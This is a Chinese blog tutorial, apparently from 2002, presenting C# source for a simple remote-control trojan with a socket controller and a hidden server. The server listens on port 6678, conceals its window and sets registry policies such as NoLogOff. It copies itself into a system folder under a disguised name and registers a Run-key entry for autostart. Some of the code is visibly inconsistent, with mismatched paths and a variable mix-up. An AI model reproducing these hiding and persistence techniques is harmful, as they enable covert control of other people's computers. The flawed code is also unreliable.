`
javababy1
  • 浏览: 1219660 次
  • 性别: Icon_minigender_1
  • 来自: 北京
文章分类
社区版块
存档分类
最新评论

用C#实现木马程序(分析)

阅读更多
前一段时间我写了一个关于用C#木马的程序(程序见前),抱歉没有写分析,让大家难过了,现在补上:)。
前言:
我的技术不是很好,如果你是为了学习木马技术也许没有什么启发,这篇文章为了给学习C#的朋友。
木马的介绍:(参照黑客防线2000-2001精华本中的木马原理揭秘)
因为本程序是木马程序,所以在介绍之前有一些木马构成的基本知识事先说明,因为下面很多地方会提到这些内容。一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。这里主要对软件部分介绍,它主要有控制端程序、木马程序(后台服务程序)、木马配制程序组成。控制端用以远程控制服务端的程序;木马程序是潜入服务端内部,获取其操作权限的程序;木马配制程序是设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏的更隐蔽的程序。
使用的技术:
控制端程序发送控制码控制服务器,服务器后台运行,修改注册表达到控制的目的。技术不是很难的,主要体现C#的网络编程和注册表的修改。
控制端开发:
控制端向服务器发出一段控制码,服务端(木马程序)收到控制码后,根据控制的要求,完成指定的要求,如果服务器完成工作,返回成功的信息。
控制端的开发:
控制码的设定你可以自已设定,不需要详解,主要有以下几个难点。
1 连接请求
使用了.NET类中的 System.Net.Sockets.TcpClient类,
TcpClient(string hostname,int port)
Hostname 是要控制的主机名称,当然你也可以用IP地址。
Port是端口。
// System.EventArgs包含事件数据类的基类
private void button7_Click(object sender, System.EventArgs e)
{
//记录操作,在richTextBox控件中增加操作信息
richTextBox1.AppendText("请求连接" +textBox1.Text +"\r");
int port =6678;
try
{
//初始化 TcpClient 类的新实例并连接到指定主机上的指定端口
client = new TcpClient(textBox1.Text,port);
}
catch
{
MessageBox.Show("服务器不在线!确定是否输入主机名称.");
richTextBox1.AppendText("服务器不在线!确定是否输入主机名称.");
}
}//private void buttion
2测试是否与被控制机连接上。程序的流程是发送控制码看控制端是否有反应,如果有返回则显示控制成功。
//提供网络访问的数据流
//private NetworkStream stream;
代码如下:
private void button8_Click(object sender, System.EventArgs e)
{
//纪录操作
richTextBox1.AppendText("测试连接" +"\r");
try
{

stream = client.GetStream();
if(stream.CanWrite)
{
//发送控制码
string control = "jiance";
byte[] by =System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
stream.Write(by,0,by.Length);
//下次使用
stream.Flush();
//启动接收反回数据的线程
//receive是线程执行的函数,见后面的分析
threadReceive = new Thread(new ThreadStart(receive));
threadReceive.Start();
}
}
catch(Exception ee)
{
richTextBox1.AppendText (ee.Message+"\r");
MessageBox.Show(ee.Message);
}
}
3控制生效的代码
private void button9_Click(object sender, System.EventArgs e)
{
//这里是确定要发送的控制码,RadioButton是窗体控件
if(radioButton1.Checked){ control = form2.zhucex;}
else if(radioButton2.Checked){ control =form3.zhuces;}
else if(radioButton3.Checked){ control = warring;}
else if(radioButton4.Checked){ control =suggest;}
else if(radioButton5.Checked){ control =form4.mumawe;}
else if(radioButton6.Checked){ control =drop;}
if (control =="000000")
{
MessageBox.Show("你没有输入任何控制目标!不发控制信号");
richTextBox1.AppendText("你没有输入任何控制目标!不发控制信号");
}
else if(control != "000000")
{
try
{
//记录操作
richTextBox1.AppendText (control + "正在试图控制,等待回应......" + "\r");
stream = client.GetStream();
if(stream.CanWrite )
{
byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray ());
stream.Write(by,0,by.Length);
stream.Flush();
threadReceive =new Thread(new ThreadStart(receive));
threadReceive.Start();
}//endif
}//try
catch
{
richTextBox1.AppendText("服务器未连接1控制无效!" +"\r");
MessageBox.Show("服务器未连接1控制无效!" +"\r");
}
}//else if
}

4线程执行的函数
private void receive()
{
//设置读取数据的空间
byte[] bb = new byte[3];
//读取3个字节,i为实际读取的字节数
int i = stream.Read(bb,0,3);
//转换成字符串,如果是中文控制码则用string ss = //System.Text.Encoding.Unicode.GetString(bb);
string ss = System.Text.Encoding.ASCII.GetString(bb);
//hjc为我设置的服务器的返回码 hjc为连接成功,hkz为控制成功
if(ss=="hjc")
{
MessageBox.Show("连接成功");
richTextBox1.AppendText("连接成功");
}
if(ss== "hkz")
{
richTextBox1.AppendText(control +"控制成功"+"\r");
MessageBox.Show(control +"控制成功"+"\r");
}
}
服务端的开发:
要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面对这三方面做介绍:
1.在VC#中,建立一个后台服务程序是很容易的,先建立一个新的C#的Windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称),将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示,并将属性“Windowstate”属性设为Mininized即可,这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置,此函数起初始化的作用,在窗体显示前运行,代码如下:
private void InitializeComponent()
{
//
// Form1
//
//窗体显示的起点和大小
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
//窗体名称
this.Name = "Form1";
//设置属性让它后台运行
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2. 控制代码的接收,必需在服务程序运行开始就启动,所以侦听线程必需在程序初始化中启动,所以放在窗体的构造函数中,代码注解如下:
public Form1()//窗体的构造函数
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();

//
// TODO: 在 InitializeComponent 调用后添加任何构造函数代码
//加入你的侦听代码
//端口你可以自已设定,我使用了固定的端口
int port=6678;
//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的
listener = new TcpListener(port);
//启动侦听
listener.Start();
//增加接收控制码的线程,如果要停止线程可以用 Thread.abort()
//reControlCode 是线程启动执行的函数,此函数根据接收的控制
//控制码选取合适的注册表修改函数
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode函数如下,完整代码见程序
private void reControlCode()
{
//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求
socket = listener.AcceptSocket();
//如果连接成功执行
while (socket.Connected)
{
//接收控制码
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
//根据控制码执行不同的功能

//修改注册表加入编码
switch (ss)
{
case "jiance"://测试连接,返回测试信息
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
//修改注册表函数,自已定义,见下面分析
UnLogOff();
//返回控制消息
retMessage();
break;

case"zx0100":
//修改注册表函数
UnClose();
//返回控制消息
retMessage();
break;
//重复的case功能与前面一样,略掉
default:
break;
}//case
}//while
}//private void reControlCode
3.C#中实现注册表的修改,使用了.NET类库中的System.Microsoft.Win32命令空间,它提供两种类型的类:处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序:使计算机不能注销。在这之前先了解注册表,在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
下面设键值NoLogOff 为 1 即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改:
private void UnLogOff()
{
//得到主机的注册表的顶级节点
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
//设置一个注册表子键的变量
RegistryKey key1;
try
{
//函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键
//registrykey是用户指定的键值,canwrite 为true则可修改,默认为fasle不可改
key1 =
rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
//设置子键的键名,和值
key1.SetValue ("NoLogOff",1);
//关闭打开的子键
key1.Close();
//警告字符串设定
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改!请将它置为0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改!请将它置为0!";
}
catch{}
}
}
4.在木马程序中还有一个重要的功能就是自我的复制和转移。木马引入被控制的主机时必需自动将木马隐藏在System,System32的目录下以防被发现。转移的代码分析如下,主要实现的功能是将D盘下的木马程序转移到C:\\winnnt\\system\\msdoss.exe,同时换名称。使用的.NET命名空间System.IO,它的作用是允许对数据流和文件进行同步和异步读写。这里我们使用了System.IO.File类。
private void moveCC1()
{
try
{
//函数File.Move(string sourceFileName,string destFileName)起移动文件的作用
//sourceFileName为要移动的文件名,destFileName为文件的新路径
File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");
}
catch {}
//将新移的木马程序设为自启动.分析和前面一样
try
{
key1= rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()
到这里一个简单的C#的木马就完成了,如果有有疑问请到 www.vchelp.net论坛的C#或是.NET版面和我讨论,或发信给我 chenweijun_sh@etang.com,当然你也可以和黑防联系。
落叶夏日
2002-07-29
分享到:
评论

相关推荐

    木马技术的简单分析与实践(C# socket)

    本主题将深入探讨“木马技术的简单分析与实践”,重点在于如何使用C#的Socket技术来实现这一目标。Socket编程是网络通信的基础,它允许程序在不同设备之间建立连接,交换数据。 首先,我们要理解木马的基本工作原理...

    C#系统木马病毒开发

    【标题】:“C#系统木马病毒开发”这一主题涉及到的是使用C#编程语言来创建具有自我复制功能的恶意软件,通常称为木马病毒。在IT安全领域,这是一个非常敏感的话题,因为这样的知识通常被用于非法活动。然而,了解其...

    C#数据库木马批量清除工具源码

    在这个项目中,C#被用来编写与数据库交互的代码,以及实现用户界面和木马检测清除功能。 数据库木马通常是指通过SQL注入等手段植入到数据库系统中的恶意代码,它们可能用于窃取数据、破坏系统或者控制服务器。批量...

    C#网络通信程序设计 源码

    阐述主机扫描、串口通信、TCP协议编程、UDP协议编程、木马程序、屏幕监视、IP语音网络通信、网络视频传输、Email协议编程、FTP协议编程、网络测量程序、网络信息加密传输和网络信息隐藏通信编程等原理、技术分析、...

    C#超经典源码大集

    C#ie实现自动下载示例、C#Socket基本编程、C# WinForm制作异形窗体与控件、C# 编写定时关机程序、C#对注册表的操作、C# 简单文本文件读写、C# 控制远程计算机的服务的方法、C# 木马寄存方式收集、C#实现通过程序自动...

    用C#写的文件监控程序

    本文将深入探讨使用C#编程语言构建文件监控程序的相关知识点,包括基本概念、实现原理以及核心功能。 首先,C#是微软开发的一种面向对象的编程语言,广泛应用于Windows平台的软件开发,包括桌面应用、服务器应用...

    c#远程控制源码(包括pcshare 源码哦)

    在这个"c#远程控制源码(包括pcshare 源码哦)"的压缩包里,你将获得四款用C#编写的远程控制软件的源代码,这对于学习、研究或改进远程控制技术有着极大的价值。 首先,让我们来了解一下PCShare。PCShare通常被认为...

    WPF 3D旋转木马

    通过分析和理解这个项目,开发者可以学习到如何在WPF中构建自己的3D应用程序,提升其在UI设计和3D编程领域的技能。而文件名"3Dshow"可能指的是项目的主要展示组件或者包含所有3D模型和资源的文件夹。

    C#开发的服务器网马扫描器

    【C#开发的服务器网马扫描器】是一个利用C#编程语言实现的工具,主要用于检测服务器网站的安全性,特别是针对网络木马(Net Malware,简称网马)的扫描。网马是一种恶意软件,通常被植入网站以非法获取敏感信息、...

    C# socket 多线程实例

    通过分析和学习这个实例,你可以更好地理解C#中Socket和多线程的使用,以及如何解决实际开发中遇到的问题,比如如何优雅地结束服务器程序。在实际项目中,还需要考虑错误处理、异常捕获、性能优化等更复杂的因素。

    C#远程控制源代码

    【C#远程控制源代码】是一个使用C#编程语言实现的远程控制软件的源代码集合。这个项目展示了如何利用C#的强大功能来构建一个高效且功能丰富的远程控制系统。C#是一种面向对象的、类型安全的编程语言,由微软开发,...

    使用MSIL采用Emit方式实现C#的代码生成与注入.docx

    总结本文主要介绍了使用MSIL和Emit方式实现C#代码生成与注入的方法,讲解了MSIL的基本概念以及代码注入的原理和步骤。通过这一技术,开发者可以在无法获取源代码的情况下修改.NET程序的行为,这对于热更新、插件开发...

    漏洞上传系统(c#)

    【标题】:“漏洞上传系统(c#)”指的是一个基于C#编程语言开发的Web应用程序,该程序设计用于模拟或演示网络安全中的文件上传漏洞。在实际的Web开发中,文件上传功能是常见的,但如果不加以适当的安全控制,就可能...

    c# 可疑文件扫描代码(找到木马)(简)

    在C#中,开发一个可疑文件扫描程序,用于检测潜在的木马病毒,是一个重要的安全措施。本示例代码提供了一个简单的实现,主要关注于扫描指定目录中的特定类型的文件(如`.asp`, `.php`, `.aspx`, `.master`)。下面...

    C#17个应用实例

    1. **浏览器.rar** - 这可能是一个使用C#实现的简单网络浏览器。知识点涉及:Windows Forms或WPF(用于创建用户界面),WebBrowser控件(嵌入网页浏览功能),HTTP协议理解,可能还包括HTML解析。 2. **图书销售....

    vcn远程控制源代码

    在网络安全领域,这类程序通常被称为后门或木马,因为它们可以被用来非法获取对目标计算机的远程访问权限,或者进行恶意活动。然而,这些技术同样在合法的系统管理和监控中有所应用。 源码分析: 1. **VC++ 编程**...

    ScanContentCSharp.zip

    综上所述,"ScanContentCSharp.zip"提供的内容可能是一个C#实现的解决方案,用于整合多种反恶意软件工具,对.NET Framework 4.8和.NET 6应用以及C++应用的用户输入进行深度扫描,以增强系统的安全防护。这个项目可能...

    asp.net简单网络文件夹实现上传下载(限制文件类型大小)

    ASP.NET 是一种由微软开发的用于构建Web应用程序的框架,它允许开发者使用.NET Framework和C#、VB.NET等语言创建动态网站、Web服务和Web应用程序。在这个“asp.net简单网络文件夹实现上传下载(限制文件类型大小)”...

    ScanContentCSharpNet6.zip

    标题“ScanContentCSharpNet6.zip”提示我们这是一个与安全扫描相关的项目,使用了C#编程语言,并且是针对.NET Framework 4.8和.NET 6环境设计的。描述指出这个压缩包的内容是为了合并多种反恶意软件工具,以便对...

Global site tag (gtag.js) - Google Analytics